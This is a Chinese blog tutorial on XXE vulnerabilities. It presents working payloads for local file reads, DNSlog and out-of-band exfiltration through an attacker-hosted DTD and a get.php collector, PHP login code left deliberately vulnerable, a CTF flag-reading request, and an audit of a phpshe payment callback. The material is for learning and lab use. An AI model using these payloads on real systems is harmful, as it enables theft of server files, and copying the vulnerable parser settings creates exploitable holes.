解密XXE漏洞:原理剖析、复现与代码审计实战

于 2024-08-04 00:00:00 发布
阅读量1k 收藏 22
点赞数 30
分类专栏: 网络空间安全 文章标签: 安全 网络 web安全 安全性测试 网络安全 安全威胁分析
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_80064376/article/details/140888425
版权

在网络安全领域,XML外部实体(XXE)漏洞因其隐蔽性和危害性而备受关注。随着企业对XML技术的广泛应用,XXE漏洞也逐渐成为攻击者们利用的重点目标。一个看似无害的XML文件,可能成为攻击者入侵系统的利器。因此,理解XXE漏洞的原理,并掌握其复现与代码审计技巧,对于提升系统安全性至关重要。

本文将深入剖析XXE漏洞的工作原理,展示如何在实际环境中复现该漏洞,并提供详尽的代码审计方法。无论您是网络安全初学者,还是资深开发者,都能从中获得实用的知识和技能。让我们一起解密XXE漏洞,提升我们的安全防护能力。

  1. 基本原理

    1. XML 文档可以包含实体 (Entity),实体可以是内部的(定义在文档内部)或外部的(引用外部资源)。外部实体通常用于在 XML 文档中包含外部数据。如果 XML 解析器允许解析外部实体,那么攻击者可以利用这一点来执行恶意操作。

  2. XXE发现

    1. 黑盒
      1. 获取得到Content-Type或数据类型为xml时,尝试进行xml语言payload进行测试
      2. 不管获取的Content—Type类型或数据传输类型,均可尝试修改后提交测试xxe
      3. XXE不仅在数据传输上可能存在漏洞,同样在文件上传引用插件解析或预览也会造成文件中的XXE Payload被执行
    2. 白盒
      1. 可通过应用功能追踪代码定位审计
      2. 可通过脚本特定函数搜索定位审计
      3. 可通过伪协议玩法绕过相关修复等

  3. XXE~payload

    1. 读取文件
      1.   <?xml version="1.0"?>
  <!DOCTYPE Mikasa [
    <!ENTITY test SYSTEM "file:///d:/e.txt">
  ]>
  <user>
    <username>&test;</username>
    <password>Mikasa</password>
  </user>
    2. 带外测试
      1.   <?xml version="1.0"?>
  <!DOCTYPE test [
    <!ENTITY % file SYSTEM "http://7drrcs.dnslog.cn">
    %file;
  ]>
  <user>
    <username>&send;</username>
    <password>Mikasa</password>
  </user>
    3. 引用外部实体dtd
      1.   <?xml version="1.0" ?>
  <!DOCTYPE test [
  <!ENTITY % file SYSTEM "http://127.0.0.1/evil2.dtd">
  %file;
  ]>
  <user><username>&send;</username><password>Mikasa</password></user>
  -----------------------------------------------------------------------------
  evil2.dtd
  <!ENTITY send SYSTEM "file:///d:/1/1.txt">
    4. 无回显读文件-带外
      1.   <?xml version="1.0"?>
  <!DOCTYPE ANY [
  <!ENTITY % file SYSTEM "file:///d:/e.txt">
  <!ENTITY % remote SYSTEM "http://47.94.236.117/test.dtd">
  %remote;
  %all;
  ]>
  <root>&send;</root>
  -------------------------------------------------------------------------------
  服务端
  test.dtd
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://47.94.236.117/get.php?file=%file;'>">

  get.php
  <?php
  $data = $_GET['file'];
  $myfile = fopen("file.txt", "w+");
  fwrite($myfile, $data);
  fclose($myfile);
  ?>

  4. 复现

    1. **复现文件:**​php_xxe.zip

    2. 读取文件
      1. 源码
        1.   doLogin.php
  <?php
  $USERNAME = 'admin'; //账号
  $PASSWORD = 'admin'; //密码
  $result = null;

  libxml_disable_entity_loader(false);
  $xmlfile = file_get_contents('php://input');

  try{
  	$dom = new DOMDocument();
  	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
  	$creds = simplexml_import_dom($dom);

  	$username = $creds->username;
  	$password = $creds->password;

  	if($username == $USERNAME && $password == $PASSWORD){
  		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
  	}else{
  		$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
  	}
  }catch(Exception $e){
  	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
  }

  header('Content-Type: text/html; charset=utf-8');
  echo $result;
  ?>

      2. 捉取登录框的数据包,替换数据包内容即可

    3. 带外测试
      1. 源码
        <?php
$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

      2. 捉取数据包,替换其内容即可

    4. 外部实体引用

      1. 源码同上

      2. 本地有一个dtd文件,evil2.dtd,内容为 <!ENTITY send SYSTEM "file:///d:/1/1.txt">

      3. 捉包,改包来引用他

    5. 无回显带外
      1. 源码
        <?php
$USERNAME = 'admin'; //账号
$PASSWORD = 'admin'; //密码
$result = null;

libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');

try{
	$dom = new DOMDocument();
	$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
	$creds = simplexml_import_dom($dom);

	$username = $creds->username;
	$password = $creds->password;

	if($username == $USERNAME && $password == $PASSWORD){
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",1,$username);
	}else{
		//$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",0,$username);
	}
}catch(Exception $e){
	$result = sprintf("<result><code>%d</code><msg>%s</msg></result>",3,$e->getMessage());
}

header('Content-Type: text/html; charset=utf-8');
echo $result;
?>

      2. 在服务端部署evil2.dtd,和get.php

        1.   <?xml version="1.0"?>
  <!DOCTYPE ANY[
  <!ENTITY % file SYSTEM "file:///d:/1/1.txt">
  <!ENTITY % remote SYSTEM "http://43.139.186.80/evil2.dtd">
  %remote;
  %all;
  ]>
  <root>&send;</root>
  ---------------------------------------------
  服务端
  evil2.dtd
  <!ENTITY % all "<!ENTITY send SYSTEM 'http://43.139.186.80/get.php?file=%file;'>">

  get.php
  <?php
  $data = $_GET['file'];
  $myfile = fopen("file.txt", "w+");
  fwrite($myfile, $data);
  fclose($myfile);
  ?>

      3. 捉包替换数据包内容将1.txt的内容带到服务端

    6. CTF赛题

      1. 前端代码
        1.   靶场地址:http://web.jarvisoj.com:9882/
  <html>
  <head>
  <link href="//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/css/bootstrap-editable.css" rel="stylesheet"/>
  <script src="//cdnjs.cloudflare.com/ajax/libs/x-editable/1.5.0/bootstrap3-editable/js/bootstrap-editable.min.js"></script>
  </head>
  <body>
  <div class="show">
  <textarea id="tip-area" width=100px height=50px disabled></textarea>
  </div>
  <div class="control-area">
  <input id="evil-input" type="text" width=100px height=50px value="type sth!"/>
  <button class="btn btn-default" type="button" onclick="send()">Go!</button>
  </div>
  <script>
  function XHR() {
          var xhr;
          try {xhr = new XMLHttpRequest();}
          catch(e) {
              var IEXHRVers =["Msxml3.XMLHTTP","Msxml2.XMLHTTP","Microsoft.XMLHTTP"];
              for (var i=0,len=IEXHRVers.length;i< len;i++) {
                  try {xhr = new ActiveXObject(IEXHRVers[i]);}
                  catch(e) {continue;}
              }
          }
          return xhr;
      }

  function send(){
   evil_input = document.getElementById("evil-input").value;
   var xhr = XHR();
       xhr.open("post","/api/v1.0/try",true);
       xhr.onreadystatechange = function () {
           if (xhr.readyState==4 && xhr.status==201) {
               data = JSON.parse(xhr.responseText);
               tip_area = document.getElementById("tip-area");
               tip_area.value = data.task.search+data.task.value;
           }
       };
       xhr.setRequestHeader("Content-Type","application/json");
       xhr.send('{"search":"'+evil_input+'","value":"own"}');
  }
  </script>
  </body>
  </html>
  //可以看到XMLHttpRequest,猜测存在xxe漏洞·

      2. 捉取数据包并修改内容和类型

        POST /api/v1.0/try HTTP/1.1
Host: web.jarvisoj.com:9882
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
Referer: http://web.jarvisoj.com:9882/
Content-Length: 108
DNT: 1
Connection: close

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY f SYSTEM "file:///home/ctf/flag.txt">
]>
<x>&f;</x>

代码审计流程

  1. 源码链接:https://pan.baidu.com/s/15O6Hf2tM90T3ZEp9E2x_Ew?pwd=cong

  2. 过程

    1. 首先放入审计系统

    2. 搜索可疑xxe函数simplexml_load_string

    3. 看到敏感可疑函数,最终pe_getxml函数的调用

    4. 最终到wechat_getxml,继续全局搜索最终

    5. 最后追踪到这个路径D:\phpstudy_pro\WWW\phpshe\include\plugin\payment\wechat\notify_url.php

    6. 在网站上访问并测试是否存在漏洞

    7. 发现xxe漏洞,因为通过源码发现他的返回结果是固定的,所以利用无回显文件外带即可任意读取

通过本次学习,我们不仅深入了解了XXE漏洞的原理,还掌握了复现该漏洞的具体步骤和代码审计的方法。安全防护不仅是技术问题,更是一种意识和态度。通过对XXE漏洞的全面剖析,我们能够更好地识别和修复潜在的安全风险,从而保护我们的系统和数据安全。

在信息安全的道路上,没有终点。希望本文能为您在安全防护方面提供有价值的指导和帮助,激发您对网络安全的持续关注和兴趣。让我们共同努力,构建一个更为安全的网络环境。如果您有任何疑问或宝贵的建议,欢迎在评论区与我们互动。感谢您的阅读,期待您的反馈与分享!

CongSec
关注
  • 30
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
细节揭示:XXE漏洞复现步骤及安全防护建议
weixin_43263566的博客
08-31 309
XXE漏洞发生在那些使用XML解析器处理用户提供的XML输入的应用程序中。攻击者通过在用户输入的XML文档中插入恶意的实体引用,来触发XML解析器加载外部实体。这些外部实体可能指向本地文件系统或通过网络访问的远程资源。
[网络安全自学篇] 二十五.Web安全学习路线及木马、病毒和防御初探
热门推荐
杨秀璋的专栏
11-12 3万+
这是作者的系列网络安全自学教程,主要是关于网安工具和实践操作的在线笔记,特分享出来与博友共勉,希望您们喜欢,一起进步。前文分享了分享机器学习在安全领域的应用,并复现一个基于机器学习(逻辑回归)的恶意请求识别。这篇文章简单叙述了Web安全学习路线,并实现了最简单的木马和病毒代码,希望对读者有所帮助。
XXE漏洞复现
C233333235的博客
07-25 842
XML外部实体注入(XML Extenrnal Entity Injection),简称XXE漏洞。引发XXE漏洞的主要原因是XML解析依赖库libxml默认开启了对外部实体的引用,导致服务端在解析用户提交的XML信息时未作处理直接进行解析,导致加载恶意的外部文件和代码,造成任意文件读取,命令执行(利用条件苛刻)内网扫描等危害在本篇 文章中我们使用pikachu靶场实现XXE漏洞复现
Vulnhub--XXE漏洞复现
qq_62169455的博客
08-23 390
下载完后,选择OVF文件,打开方式选择VMware,存储位置看你自己,然后打开靶机需要我们去登录,这里是没有现成的信息可以让我们登录(Vulnhub的靶场就是比较贴近于实战的环境,这里登录进去就可以直接看到flag,所以它不会直接给我们登录信息),于是就需要通过其他一些渗透手段来获取登录信息。
jarvisoj WEB +MISC writeup
Ni9htMar3的博客
12-26 7277
WEB PORT 51 Login LOCALHOST 神盾局的秘密 IN a mess Easy Gallery Simple Injection 方法一 方法二 api的调用 PHPINFO
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5518
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 2603
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
[网络安全自学篇] 四十八.Cracer第八期——(1)安全术语、Web渗透流程、Windows基础、注册表及黑客常用DOS命令
杨秀璋的专栏
02-21 2万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了微软证书漏洞(CVE-2020-0601),并详细讲解了Windows验证机制、可执行文件签名复现及HTTPS劫持。本文将分享另一个主题——Cracer教程,第一篇文章将详细讲解安全术语、Web渗透流程和Windows基础、注册表及黑客常用DOS命令。基础性文章,希望对您有所帮助。
XXE漏洞靶场复现
weixin_63124284的博客
10-19 899
XXE也叫XML(可扩展标记语言)外部实体注入,然后我们这里拆开来解释!!! 外部实体:通过调用外部实体声明部分对XML数据进行修改、插入恶意代码。 注入:在XML数据传输过程中,数据被恶意修改,导致服务器最终执行了修改后的恶意代码。 因此XXE指的是XML数据在传输过程中,利用外部实体声明部分的“SYSTEM”关键字导致XML解析器可以从本地文件或者远程的URL中读取受保护的数据。
xxe漏洞之——漏洞复现
wsnbbz的博客
03-04 1453
漏洞介绍 XXE全称XML External Entity Injection,也就是XML外部实体注入攻击,漏洞是对非安全的外部实体数据进行处理时引发的安全问题。要了解XXE,就必须懂得XML的一些规则。 XML是用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档...
xxe简单漏洞复现
西部壮仔的博客
05-25 882
xml初识 XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 漏洞复现 php代码: <?php $xml = file_get_contents("php://input"); $data = simplexml_load_string($xml); echo "<pre>"; print_r($data); //注释掉该语句即为无回显的情
Apache solr xxe漏洞复现(CVE-2017-12629)
whojoe的博客
07-06 2044
Apache solr xxe漏洞复现(CVE-2017-12629)前言环境搭建漏洞复现参考文章 前言 影响版本 Apache Solr < 7.1 Apache Lucene < 7.1 环境搭建 启动docker systemctl start docker 获取vulhub git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git 进入对应目录 cd vulhub/solr/CVE-2017-12629-X
漏洞复现xxe漏洞
千寻的博客
07-30 687
文章目录XXE-基础实验实验目的实验环境实验工具实验内容实验步骤1.访问目标进行注入攻击2.尝试进行登录,并进行抓包3.根据xxe注入漏洞,构造payloa免责声明 XXE-基础实验 实验目的 练习XXE(XML注入) 实验环境 目标机: windows2008 172.16.12.2 目标地址:http://172.16.12.2 实验工具 火狐浏览器:是一款非常稳定,非常流行的Internet浏览器 Burp Suite 实验内容 XXE(XML注入) 实验步骤 1.访问目标进行
XXE漏洞靶机复现
最新发布
C233333235的博客
07-25 438
然后再次回去登录进行抓包(因为管理员登陆页面没有xxe,所以回到第一个登陆页面),然后用如下代码替换xml语句(后来发现不用重新抓包,一直用重放器里的请求包就行)他说flag在这个里面,所以据推测这也是一段编码文字,我们再次拿去解码,试了base64后发现解码失败,我们再试试base32,发现解码成功了.像之前一样再次拿去登陆抓包中,用xml语句进行查询,语句如下(后来发现不用重新抓包,一直用重放器里的请求包就行)但是这仍然不是我们要的路径,再次拿去解码,这次又变成了base64,解码成功。
XXE漏洞复现(有无回显)
cainiao17441898的博客
07-01 1779
环境:这里可以在metasploitable中进行试验,不可以在centos中进行试验,因为默认情况下centos中已经修复相关漏洞。libxml2.9.0之后默认不执行外部实体。用命令:rpm -qa | grep libxml可以去查看libxml的版本。 复现: 先去生成一个解析xml数据并打印传入的数据的一个php文件。 <?php $xml=file_get_contents("php://input"); $data = simplexml_load_string($xml) ; e
XXE漏洞复现
weixin_45643931的博客
08-20 802
XXE漏洞 全称XML External Entity Injection即XML外部实体注入漏洞 由名字可以知道 这是关于XML的漏洞 SQL注入是在注入点处输入SQL恶意语法执行达到自己的目的 那么XXE应该也是类似的 在可以解析XML的地方(比如一个输入框等处)提交XML的恶意代码来执行 ⅩXE漏洞发生在应用序解析ⅩML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读命令执行、内网端口扫描、攻击内网网站、发起dos攻击等危害 ...
XXE漏洞详解:XML语法、攻防策略与实战示例
XXE全称XML External Entity Injection,即XML外部实体注入攻击,是针对XML文档处理中的一种严重安全漏洞。它源于对XML语法规则的不当使用,特别是当系统处理包含外部实体引用的不安全输入时,可能导致数据泄露或...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CongSec

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值